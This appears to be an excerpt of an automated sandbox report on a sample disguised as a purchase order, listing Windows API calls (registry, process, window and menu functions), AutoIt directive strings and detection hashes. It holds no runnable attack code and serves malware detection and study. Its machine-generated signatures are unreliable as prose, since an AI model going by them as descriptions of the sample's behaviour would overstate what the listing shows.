                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert_memset
                      • String ID: 0
                      • API String ID: 3866635326-4108050209
                      • Opcode ID: a00b728af65b2175d548c5e9a463cf12a44fd292c63866847163db680c8beb7c
                      • Instruction ID: 677b27751887ae9b56808dc5113d938baaf532f5ce89a04330ca5d8a39cbab83
                      • Opcode Fuzzy Hash: a00b728af65b2175d548c5e9a463cf12a44fd292c63866847163db680c8beb7c
                      • Instruction Fuzzy Hash: B2410375A00309EFDB20DF94D884BEABBB9FB09354F04846AFA1997251D730AE54CB60
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00AF3C92
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF3CBC
                      • FreeLibrary.KERNEL32(00000000), ref: 00AF3D71
                        • Part of subcall function 00AF3C63: RegCloseKey.ADVAPI32(?), ref: 00AF3CD9
                        • Part of subcall function 00AF3C63: FreeLibrary.KERNEL32(?), ref: 00AF3D2B
                        • Part of subcall function 00AF3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AF3D4E
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AF3D16
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                      • String ID:
                      • API String ID: 395352322-0
                      • Opcode ID: 73080869b35aee0b4ca7a1cb8838c98a94fd067f9ed2b11b2df747be8cf06e27
                      • Instruction ID: ca39917dd06ba4c82e38f8b87432b28ed112cbd659468d685a1bff407a852298
                      • Opcode Fuzzy Hash: 73080869b35aee0b4ca7a1cb8838c98a94fd067f9ed2b11b2df747be8cf06e27
                      • Instruction Fuzzy Hash: 46311872900209BFDF159BD4DC89AFEB7BCEF08340F50456AB612A3150DA709F498B60
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AF8DF4
                      • GetWindowLongW.USER32(013802C0,000000F0), ref: 00AF8E27
                      • GetWindowLongW.USER32(013802C0,000000F0), ref: 00AF8E5C
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AF8E8E
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AF8EB8
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AF8EC9
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AF8EE3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: 51fa828be576f8fd5c14876c7264696d5ff64c82a9638860b1220de7c03c9e06
                      • Instruction ID: 68166391e14d37f6a19d07cf422674f135e385bf22bb9994f370b062769ce67b
                      • Opcode Fuzzy Hash: 51fa828be576f8fd5c14876c7264696d5ff64c82a9638860b1220de7c03c9e06
                      • Instruction Fuzzy Hash: AD311F31600219AFDB20CF98DC89FA53BA5FB4A754F1945A8F6158B2B2CF75EC40DB40
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1734
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD175A
                      • SysAllocString.OLEAUT32(00000000), ref: 00AD175D
                      • SysAllocString.OLEAUT32(?), ref: 00AD177B
                      • SysFreeString.OLEAUT32(?), ref: 00AD1784
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00AD17A9
                      • SysAllocString.OLEAUT32(?), ref: 00AD17B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 8e4d29db277461a66ca678f705e172829bd712e62a5710aad201055a188b1705
                      • Instruction ID: b7556c195dc4d696cadeae6ab2a519c2cd4389e61c60221c7c96ae235d36df34
                      • Opcode Fuzzy Hash: 8e4d29db277461a66ca678f705e172829bd712e62a5710aad201055a188b1705
                      • Instruction Fuzzy Hash: 7E216275600219BF9B109BA8DC88CEB77ECEB09360B408526F916DB361DB74EC418B60
                      APIs
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                      • lstrcmpiW.KERNEL32(?,?), ref: 00AD6A2B
                      • _wcscmp.LIBCMT ref: 00AD6A49
                      • MoveFileW.KERNEL32(?,?), ref: 00AD6A62
                        • Part of subcall function 00AD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                        • Part of subcall function 00AD6D6D: GetLastError.KERNEL32 ref: 00AD6DC5
                        • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                      • _wcscat.LIBCMT ref: 00AD6AA4
                      • SHFileOperationW.SHELL32(?), ref: 00AD6B0C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                      • String ID: \*.*
                      • API String ID: 2323102230-1173974218
                      • Opcode ID: 1ebc9c77d9d9cb3512fef5e996bda140a7f2205e1531bb7647c00277da8d2323
                      • Instruction ID: 28857fe3dec35e7304a4db3bd4e4e37a9e48d34013b09fbc25f35cec9cbeccdd
                      • Opcode Fuzzy Hash: 1ebc9c77d9d9cb3512fef5e996bda140a7f2205e1531bb7647c00277da8d2323
                      • Instruction Fuzzy Hash: 993123719002186ACF50EFB4E945ADDB7B8AF08340F5045EBE55AE3251EB349B89CB64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 1038674560-2734436370
                      • Opcode ID: e8e02196f001f14954d8770591d416e66981c9a52c92b14aaef4a8cea30d75bf
                      • Instruction ID: 651fa8d723c3546a38164eb4a8ed007b811180678c56eda84fa3c1e3cd8b707e
                      • Opcode Fuzzy Hash: e8e02196f001f14954d8770591d416e66981c9a52c92b14aaef4a8cea30d75bf
                      • Instruction Fuzzy Hash: 0B21077220462176D631A7389D02FF773ECDF69310F544527F58787296EB919A82C392
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD180D
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1833
                      • SysAllocString.OLEAUT32(00000000), ref: 00AD1836
                      • SysAllocString.OLEAUT32 ref: 00AD1857
                      • SysFreeString.OLEAUT32 ref: 00AD1860
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00AD187A
                      • SysAllocString.OLEAUT32(?), ref: 00AD1888
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 7ebfe1f3cb773fd2bb8c9fd7abd4e30dba7af9857fc76bb269d50132d4f7595d
                      • Instruction ID: cf750c8df2ae848ad7cb5abdf7b63f4b45cdd7e943adf91bf6ce5b930c0ff629
                      • Opcode Fuzzy Hash: 7ebfe1f3cb773fd2bb8c9fd7abd4e30dba7af9857fc76bb269d50132d4f7595d
                      • Instruction Fuzzy Hash: 3C211275604204BF9B10DBE8DC89DEE77ECEB09360B408126F915DB361EA74EC419B64
                      APIs
                        • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                        • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                        • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AFA13B
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AFA148
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AFA153
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AFA162
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AFA16E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 617f53023a2e65fd3408641ee083fcf956edc3341c9ff3a7c24f63ded6f74800
                      • Instruction ID: af571a6cdb97a67690d7039ec3dd74cc4f809591bcbbf7086bba590c01674067
                      • Opcode Fuzzy Hash: 617f53023a2e65fd3408641ee083fcf956edc3341c9ff3a7c24f63ded6f74800
                      • Instruction Fuzzy Hash: C11151B155021DBEEB119FA5CC85EE77F6DEF09798F014215F608A7090CA729C21DBA4
                      APIs
                      • GetClientRect.USER32(?,?), ref: 00AAC6C0
                      • GetWindowRect.USER32(?,?), ref: 00AAC701
                      • ScreenToClient.USER32(?,?), ref: 00AAC729
                      • GetClientRect.USER32(?,?), ref: 00AAC856
                      • GetWindowRect.USER32(?,?), ref: 00AAC86F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Rect$Client$Window$Screen
                      • String ID:
                      • API String ID: 1296646539-0
                      • Opcode ID: 8e5f12fa2d2d348adcd67b08b1d31f98df3f0e6b4e5cac6b734a2c976879ef82
                      • Instruction ID: 24cffc152942ba06710fe18684ee6a66c0c08aa3b0f1b072e4261de4b3d5c75d
                      • Opcode Fuzzy Hash: 8e5f12fa2d2d348adcd67b08b1d31f98df3f0e6b4e5cac6b734a2c976879ef82
                      • Instruction Fuzzy Hash: 1BB14D7990024ADBEF10CFA8C5807EDBBB1FF09710F149569EC69EB295DB34A940CB64
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$__itow__swprintf
                      • String ID:
                      • API String ID: 3253778849-0
                      • Opcode ID: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                      • Instruction ID: 215c560de5bdc1a4a784d893a71f10655db4ff5e9c993f0caced5101ab085af9
                      • Opcode Fuzzy Hash: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                      • Instruction Fuzzy Hash: 5961BB3061020AAFCF05EF64CE82EFF37A9AF45304F04455AF85A6B292EB34D905CB51
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00AF1B09
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00AF1B17
                      • __wsplitpath.LIBCMT ref: 00AF1B45
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcscat.LIBCMT ref: 00AF1B5A
                      • Process32NextW.KERNEL32(00000000,?), ref: 00AF1BD0
                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00AF1BE2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                      • String ID:
                      • API String ID: 1380811348-0
                      • Opcode ID: 6c6e8120977651fec325e8ba18273f37e0c45c2ce9df1d018d4795c32cf685ca
                      • Instruction ID: 4a7dd3fd3337e33719f94296b3440a26eecb156625e86acf62c223c6c570cc29
                      • Opcode Fuzzy Hash: 6c6e8120977651fec325e8ba18273f37e0c45c2ce9df1d018d4795c32cf685ca
                      • Instruction Fuzzy Hash: 33517D71504304AFD720EF64C985EABB7ECEF89754F00491EF58997291EB70EA05CBA2
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2FA0
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2FE0
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AF3003
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AF302C
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AF306F
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF307C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                      • String ID:
                      • API String ID: 4046560759-0
                      • Opcode ID: 77bd834ecfabadbf604c500384cdc016202bbfe02b0a9053062e5fc01b6280f5
                      • Instruction ID: da0f706ab87dce8cea50c38d95943bef1182f50efcc6191a70a1cb352257fa87
                      • Opcode Fuzzy Hash: 77bd834ecfabadbf604c500384cdc016202bbfe02b0a9053062e5fc01b6280f5
                      • Instruction Fuzzy Hash: CA515A322182049FCB05EFA4C995E6FB7F9BF88314F04491EF646872A1DB71EA15CB52
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$_wcscat
                      • String ID:
                      • API String ID: 2037614760-0
                      • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                      • Instruction ID: 9d612a68bf617f92cd06da002f3852ed67ed8a1c9ea7b5934279fe912c3ec4b6
                      • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                      • Instruction Fuzzy Hash: AF511530A04215AACF21AFA8C5419FDB7B4FF06720F90804AF5C2AB6D2DBB45F42D790
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00AD2AF6
                      • VariantClear.OLEAUT32(00000013), ref: 00AD2B68
                      • VariantClear.OLEAUT32(00000000), ref: 00AD2BC3
                      • _memmove.LIBCMT ref: 00AD2BED
                      • VariantClear.OLEAUT32(?), ref: 00AD2C3A
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AD2C68
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType_memmove
                      • String ID:
                      • API String ID: 1101466143-0
                      • Opcode ID: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                      • Instruction ID: feae901e2471d483c860df602e2918fdce712d629a3b64223a389cfa5dc2cb78
                      • Opcode Fuzzy Hash: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                      • Instruction Fuzzy Hash: 6D517EB5A00209EFDB24CF58C880AAAB7F8FF5C314B15855AE95ADB310D734E951CFA0
                      APIs
                      • GetMenu.USER32(?), ref: 00AF833D
                      • GetMenuItemCount.USER32(00000000), ref: 00AF8374
                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF839C
                      • GetMenuItemID.USER32(?,?), ref: 00AF840B
                      • GetSubMenu.USER32(?,?), ref: 00AF8419
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AF846A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Item$CountMessagePostString
                      • String ID:
                      • API String ID: 650687236-0
                      • Opcode ID: 2a8264a678eea49f87b3fc7cc075f1ba531f412569769d7a23b7fdaa49aa79bd
                      • Instruction ID: 4dc03cf1c00c3d0fa6fb55f95622a9e8ec413596e514aa6f83a79b728ed6c4a2
                      • Opcode Fuzzy Hash: 2a8264a678eea49f87b3fc7cc075f1ba531f412569769d7a23b7fdaa49aa79bd
                      • Instruction Fuzzy Hash: 35517C75A0061AAFCF11EFA4CA41AAEB7F4EF48710F108459F915BB351DB38AE418B90
                      APIs
                      • _memset.LIBCMT ref: 00AD552E
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5579
                      • IsMenu.USER32(00000000), ref: 00AD5599
                      • CreatePopupMenu.USER32 ref: 00AD55CD
                      • GetMenuItemCount.USER32(000000FF), ref: 00AD562B
                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AD565C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                      • String ID:
                      • API String ID: 3311875123-0
                      • Opcode ID: 90e490f09b1a2fe8a548c1dfc72db7f070d512f2f3198795bf9185c6527e8dc9
                      • Instruction ID: 34fff60ed098ef29b97f98b334402f817218801ace02236730f5ca077c657990
                      • Opcode Fuzzy Hash: 90e490f09b1a2fe8a548c1dfc72db7f070d512f2f3198795bf9185c6527e8dc9
                      • Instruction Fuzzy Hash: 3A51BA70A00A09ABDF21CF78D988BAEBBF6AF15318F58421AE4069B390D770D944CB51
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AAB1C1
                      • GetWindowRect.USER32(?,?), ref: 00AAB225
                      • ScreenToClient.USER32(?,?), ref: 00AAB242
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AAB253
                      • EndPaint.USER32(?,?), ref: 00AAB29D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
